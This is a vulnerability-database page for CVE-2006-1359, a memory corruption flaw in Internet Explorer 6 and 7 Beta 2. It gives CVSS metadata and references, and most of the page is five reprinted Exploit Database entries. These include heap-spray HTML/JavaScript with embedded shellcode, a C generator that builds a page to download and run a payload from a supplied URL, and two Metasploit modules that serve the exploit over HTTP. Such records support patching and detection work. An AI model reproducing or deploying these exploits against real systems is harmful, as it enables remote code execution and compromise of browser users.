CVE-2006-1359: Details

CVE-2006-1359

Code Injection
A03-Injection
87.6%V4
Network
2006-03-22 23h00 +00:00
2018-10-18 12h57 +00:00

CVE Description

Microsoft Internet Explorer 6 and 7 Beta 2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a certain createTextRange call on a checkbox object, which results in a dereference of an invalid table pointer.

CVE Information

Related Weaknesses

CWE-ID   Weakness Name   Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metric   Score   Severity   CVSS Vector                      Source
V2       9.3                AV:N/AC:M/Au:N/C:C/I:C/A:C       nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore compares a CVE's EPSS score with those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 1838

Publication date: 2006-05-26 22h00 +00:00
Author: Thomas Waldegger
EDB Verified: Yes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<fieldset>
<h4>
<pre><td>
<menu>
<legend>
<a>
<ul>
<small>
<fieldset>
<h6>
</h6 ></u>
</optgroup>
</tr>
</map>
</ul ></dfn>
</del>
</h2>
</dir>
</ul>

# milw0rm.com [2006-05-27]
Exploit Database EDB-ID: 1628

Publication date: 2006-03-30 22h00 +00:00
Author: ATmaCA
EDB Verified: Yes

/*
 *
 * Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
 * Bug discovered by Computer Terrorism (UK)
 * http://www.computerterrorism.com/research/ct22-03-2006
 *
 * Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
 * Severity: Critical
 * Impact: Remote System Access
 * Solution Status: Unpatched
 *
 * E-Mail: atmaca@icqmail.com
 * Web: http://www.spyinstructors.com,http://www.atmacasoft.com
 * Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene
 *
 */

/*
 *
 * This one is more faster than all released createTextRange exploits
 * because it uses last version of SkyLined's heap spraying code,
 * special 10x goes to him.
 *
 */

#include <windows.h>
#include <stdio.h>

#define BUF_LEN 0x800
#define FILE_NAME "index.htm"

char body1[] =
"<input type=\"checkbox\" id=\"blah\">\r\n"
"<SCRIPT language=\"javascript\">\r\n\r\n"
"\tvar heapSprayToAddress = 0x3c0974c2;\r\n\r\n"
"\tvar payLoadCode = unescape(\"%u9090%u9090%u9090\" +\r\n"
"\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n"
"\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n"
"\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n"
"\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n"
"\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n"
"\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n"
"\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n"
"\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n"
"\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n"
"\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n"
"\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
"\t\"%u0065";

char body2[] =
"\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n"
"\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n"
"\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\r\n\r\n"
"\tvar spraySlide = unescape(\"%u9090%u9090\");\r\n"
"\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n"
"\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n"
"\tmemory = new Array();\r\n\r\n"
"\tfor (i=0;i<heapBlocks;i++)\r\n"
"\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n"
"\tvar r = document.getElementById('blah').createTextRange();\r\n\r\n"
"\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n"
"\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n"
"\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n"
"\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n"
"\t\treturn spraySlide;\r\n"
"\t}\r\n\r\n</script>";

int main(int argc,char *argv[])
{
    if (argc < 2)
    {
        printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
        printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n");
        printf("\nUsage:\n");
        printf("ie_exp <WebUrl>\n");
        return 0;
    }

    FILE *File;
    char *pszBuffer;
    char *web = argv[1];
    char *pu = "%u";
    char u_t[5];
    char *utf16 = (char*)malloc(strlen(web)*5);

    if ( (File = fopen(FILE_NAME,"w+b")) == NULL )
    {
        printf("\n [Err:] fopen()");
        exit(1);
    }

    pszBuffer = (char*)malloc(BUF_LEN);
    memcpy(pszBuffer,body1,sizeof(body1)-1);
    memset(utf16,'\0',strlen(web)*5);

    for (unsigned int i=0;i<strlen(web);i=i+2)
    {
        sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]);
        strcat(utf16,u_t);
    }

    strcat(pszBuffer,utf16);
    strcat(pszBuffer,"%u0000\");");
    strcat(pszBuffer,body2);

    fwrite(pszBuffer, BUF_LEN, 1,File);
    fclose(File);

    printf("\n\n" FILE_NAME " has been created in the current directory.\n");

    return 1;
}

// milw0rm.com [2006-03-31]
Exploit Database EDB-ID: 1620

Publication date: 2006-03-31 22h00 +00:00
Author: Randy Flood
EDB Verified: Yes

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_createtextrange;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced = {
	'Gzip'    => [1, 'Enable gzip content encoding'],
	'Chunked' => [1, 'Enable chunked transfer encoding'],
};

my $info = {
	'Name'    => 'Internet Explorer createTextRange() Code Execution',
	'Version' => '$Revision: 1.4 $',
	'Authors' => [
		'Faithless <rhyskidd [at] gmail.com>',
		'Darkeagle <unl0ck.net>',
		'H D Moore <hdm [at] metasploit.com>',
		'<justfriends4n0w [at] yahoo.com>',
		'Anonymous',
	],
	'Description' => Pex::Text::Freeform(qq{
		This module exploits a code execution vulnerability in Microsoft
		Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It
		will corrupt memory in a way, which, under certain circumstances,
		can lead to an invalid/corrupt table pointer dereference. EIP will
		point to a very remote, non-existent memory location. This module
		is the result of merging three different exploit submissions and
		has only been reliably tested against Windows XP SP2. This
		vulnerability was independently discovered by multiple parties.
		The heap spray method used by this exploit was pioneered by Skylined.
	}),
	'Arch' => [ 'x86' ],
	'OS'   => [ 'win32', 'winxp', 'win2003' ],
	'Priv' => 0,
	'UserOpts' => {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	},
	'Payload' => {
		'Space'    => 1024,
		'BadChars' => "\x00",
		'Keys'     => ['-bind'],
	},
	'Refs' => [
		['OSVDB', '24050'],
		['BID', '17196'],
		['CVE', '2006-1359'],
		['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
		['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
		['URL', 'http://www.kb.cert.org/vuls/id/876678'],
		['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
		['URL', 'http://www.shog9.com/crashIE.html'],
	],
	'DefaultTarget' => 0,
	'Targets' => [
		[ 'Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)' ],
		[ 'Internet Explorer 6 - (6.0.3790.0) -> 746F9468 (Windows XP SP2)' ],
	],
	'Keys' => [ 'ie' ],
	'DisclosureDate' => 'Mar 19 2006',
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;

	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the NOP module.");
		return;
	}

	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	);
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? Pex::Utils::SourceIP('1.2.3.4') : $self->GetVar('HTTPHOST');

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}
	return;
}

sub HandleHttpClient {
	my $self = shift;
	my $fd = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;

	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {
		$line =~ s/^\s+|\s+$//g;
		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));
		$agent = $val if $var =~ /User-Agent/i;
	}

	my $os = 'Unknown';
	$os = 'Linux' if $agent =~ /Linux/i;
	$os = 'Mac OS X' if $agent =~ /OS X/i;
	$os = 'Windows' if $agent =~ /Windows/i;

	$self->PrintLine("[*] Client connected from $rhost:$rport ($os).");

	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
	$fd->Close();
}

sub JSUnescape {
	my $self = shift;
	my $data = shift;
	my $code = '';

	# Encode the shellcode via %u sequences for JS's unescape() function
	my $idx = 0;
	while ($idx < length($data) - 1) {
		my $c1 = ord(substr($data, $idx, 1));
		my $c2 = ord(substr($data, $idx+1, 1));
		$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
		$idx += 2;
	}
	return $code;
}

sub GenerateHTML {
	my $self = shift;
	my $target = $self->Targets->[$self->GetVar('TARGET')];
	my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
	my $nops = $self->JSUnescape($self->MakeNops(4));

	my $rnd = int(rand(3));
	my $inputtype = (($rnd == 0) ? "checkbox" : (($rnd == 1) ? "radio" : "image"));

	my $inp       = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $tmp       = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $payload   = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $nopslide  = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $slidesize = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $fillblock = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $memblock  = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $heap      = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $index     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $maxIndex  = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $fillHeap  = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $start     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
	my $timer     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));

	$rnd = int(rand(2));
	my $setTimeout  =($rnd == 0) ? "setTimeout('$fillHeap()', 5);" : "";
	my $setInterval =($rnd == 1) ? "setInterval('$fillHeap()', 5);" : "";

	my $data = qq#
<html>
<head>
<script language="javascript">
var $payload=unescape("$shellcode");
var $nopslide=unescape("$nops");
var $slidesize=20+$payload.length;
while ($nopslide.length<$slidesize) { $nopslide+=$nopslide; }
var $fillblock=$nopslide.substring(0,$slidesize);
var $memblock=$nopslide.substring(0,$nopslide.length-$slidesize);
while($memblock.length+$slidesize<0x40000) { $memblock+=$fillblock; }
var $heap=new Array();
var $index=0;
var $maxIndex=2020;
function $fillHeap() {
	$timer.innerHTML=Math.round(($index/$maxIndex)*100);
	if ($index<$maxIndex) {
		$heap.push($memblock+$payload);
		$index++;
		$setTimeout
	} else {
		$timer.innerHTML=100;
		$inp=document.createElement("input");
		$inp.type="$inputtype";
		$tmp=$inp.createTextRange();
	}
}
function $start() { $setTimeout$setInterval }
</script>
</head>
<body onload="$start()">
Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.<BR />
In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.<BR />
Progress: <span id="$timer"></span>%
</body>
</html>
#;
}

sub BuildResponse {
	my ($self, $content) = @_;
	my $response =
		"HTTP/1.1 200 OK\r\n" .
		"Content-Type: text/html\r\n";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self->Gzip($content);
	}

	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
			"Connection: close\r\n";
	}

	$response .= "\r\n" . $content;
	return $response;
}

sub Chunk {
	my ($self, $content) = @_;
	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";
	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;
	my($wtr, $rdr, $err);
	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;
	return (<$rdr>);
}

1;

# milw0rm.com [2006-04-01]
Exploit Database EDB-ID: 1606

Publication date: 2006-03-22 23h00 +00:00
Author: darkeagle
EDB Verified: Yes

<!--
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
/\                                                                                   \/
     Internet Explorer Remote Code Execution Exploit v 0.1
/\   by Darkeagle of Unl0ck Research Team                                             \/
/\   used SkyLined idea of exploitation. special tnx goes to him.                     \/

Affected Software : Microsoft Internet Explorer 6.x, IE7 Beta 2
Severity          : Critical
Impact            : Remote System Access
Solution Status   : ** UNPATCHED **
Discovered by     : Computer Terrorism (UK)
Advisory Date     : 22nd March, 2006
Tested            : WinXP SP2 RUS IE 6.0 (full patched)

Vulnerability details:
PoC from CyberTerrorists crashes IE and overwrites EIP. EIP points to unknown place.
In my case it points to 0x3c0474c2. Exploit fills heap with "nops+shellcode" 'til 0x3CxxXXxx.
Then IE trys to read memory @ 0x3c0474c2. At this time 0x3c0474c2 contains nops+shellcode.
In the end IE executes shellcode.

Exploit needs more RAM. Tested under 192mb RAM with 800mb of maximum page cache.
Under 512mb code was executed after 1-1.5 minutes.

Successfull exploitation will execute standart windows calculator.

Greets: Unl0ck Researchers, 0x557 guys, ph4nt0m guys, sh0k, uf0, BlackSecurity guys, many otherz.

/\   http://unl0ck.net                                                                \/
/\   (c) 2004 - 2006                                                                  \/
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
-->

<input type="checkbox" id="blah">
<SCRIPT language="javascript">

shellcode = unescape(
"%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");

bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length + slackspace < 0x40000) block = block + block + fillblock;

memory = new Array();
for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode;

var r = document.getElementById('blah').createTextRange();

</script>

# milw0rm.com [2006-03-23]
Exploit Database EDB-ID: 16578

Publication date: 2010-09-19 22h00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# $Id: ms06_013_createtextrange.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer createTextRange() Code Execution',
			'Description'    => %q{
					This module exploits a code execution vulnerability in Microsoft
				Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It
				will corrupt memory in a way, which, under certain circumstances,
				can lead to an invalid/corrupt table pointer dereference. EIP will
				point to a very remote, non-existent memory location. This module
				is the result of merging three different exploit submissions and
				has only been reliably tested against Windows XP SP2. This
				vulnerability was independently discovered by multiple parties.
				The heap spray method used by this exploit was pioneered by Skylined.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Faithless <rhyskidd [at] gmail.com>',
					'Darkeagle <unl0ck.net>',
					'hdm',
					'<justfriends4n0w [at] yahoo.com>',
					'anonymous',
				],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-1359'],
					['OSVDB', '24050'],
					['MSB', 'MS06-013'],
					['BID', '17196'],
					['US-CERT-VU', '876678'],
					['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
					['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
					['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
					['URL', 'http://www.shog9.com/crashIE.html'],
				],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ],
					[ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 19 2006'))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Create some nops
		nops = Rex::Text.to_unescape(make_nops(4))

		# Generate a random XML namespace for VML
		xmlns = rand_text_alpha(rand(30)+2)

		# Randomize the javascript variable names
		rnd = rand(3)
		var_inputtype = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
		var_inp       = "_"+rand_text_alpha(rand(6)+3)
		var_tmp       = "_"+rand_text_alpha(rand(6)+3)
		var_payload   = "_"+rand_text_alpha(rand(6)+3)
		var_nopslide  = "_"+rand_text_alpha(rand(6)+3)
		var_slidesize = "_"+rand_text_alpha(rand(6)+3)
		var_fillblock = "_"+rand_text_alpha(rand(6)+3)
		var_memblock  = "_"+rand_text_alpha(rand(6)+3)
		var_heap      = "_"+rand_text_alpha(rand(6)+3)
		var_index     = "_"+rand_text_alpha(rand(6)+3)
		var_maxIndex  = "_"+rand_text_alpha(rand(6)+3)
		var_fillHeap  = "_"+rand_text_alpha(rand(6)+3)
		var_start     = "_"+rand_text_alpha(rand(6)+3)
		var_timer     = "_"+rand_text_alpha(rand(6)+3)

		rnd = rand(2)
		var_setTimeout  = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
		var_setInterval = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""

		# Build out the message
		content = %Q|<html>
<head>
<script language = "javascript">
var #{var_payload} = unescaape("#{shellcode}");
var #{var_nopslide} = unescape("#{nops}");
var #{var_slidesize} = 20+#{var_payload}.length;
while (#{var_nopslide}.length<#{var_slidesize}) { #{var_nopslide} += #{var_nopslide}; }
var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize});
var #{var_memblock} = #{var_nopslide}.substring(0,#{var_nopslide}.length-#{var_slidesize});
while(#{var_memblock}.length+#{var_slidesize} < 0x40000) { #{var_memblock} += #{var_fillblock}; }
var #{var_heap} = new Array();
var #{var_index} = 0;
var #{var_maxIndex} = 2020;
function #{var_fillHeap}() {
	#{var_timer}.innerHTML = Math.round((#{var_index}/#{var_maxIndex})*100);
	if (#{var_index}<#{var_maxIndex}) {
		#{var_heap}.push(#{var_memblock}+#{var_payload});
		#{var_index}++;
		#{var_setTimeout}
	} else {
		#{var_timer}.innerHTML = 100;
		#{var_inp} = document.createElement("input");
		#{var_inp}.type = "#{var_inputtype}";
		#{var_tmp} = #{var_inp}.createTextRange();
	}
}
function #{var_start}() { #{var_setTimeout}#{var_setInterval} }
</script>
</head>
<body onload="#{var_start}()">
<span id="#{var_timer}"> % </span>
</body>
</html>
|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end

Products Mentioned

Configuration 0

Microsoft >> Ie >> Version 6.0
Microsoft >> Ie >> Version 6.0
Microsoft >> Ie >> Version 7.0
Microsoft >> Internet_explorer >> Version 6.0

References

http://www.vupen.com/english/advisories/2006/1050
Tags: vdb-entry, x_refsource_VUPEN
http://www.kb.cert.org/vuls/id/876678
Tags: third-party-advisory, x_refsource_CERT-VN
http://www.osvdb.org/24050
Tags: vdb-entry, x_refsource_OSVDB
http://www.us-cert.gov/cas/techalerts/TA06-101A.html
Tags: third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/18680
Tags: third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1015812
Tags: vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/archive/1/428441
Tags: mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/17196
Tags: vdb-entry, x_refsource_BID
http://www.ciac.org/ciac/bulletins/q-154.shtml
Tags: third-party-advisory, government-resource, x_refsource_CIAC
http://www.vupen.com/english/advisories/2006/1318
Tags: vdb-entry, x_refsource_VUPEN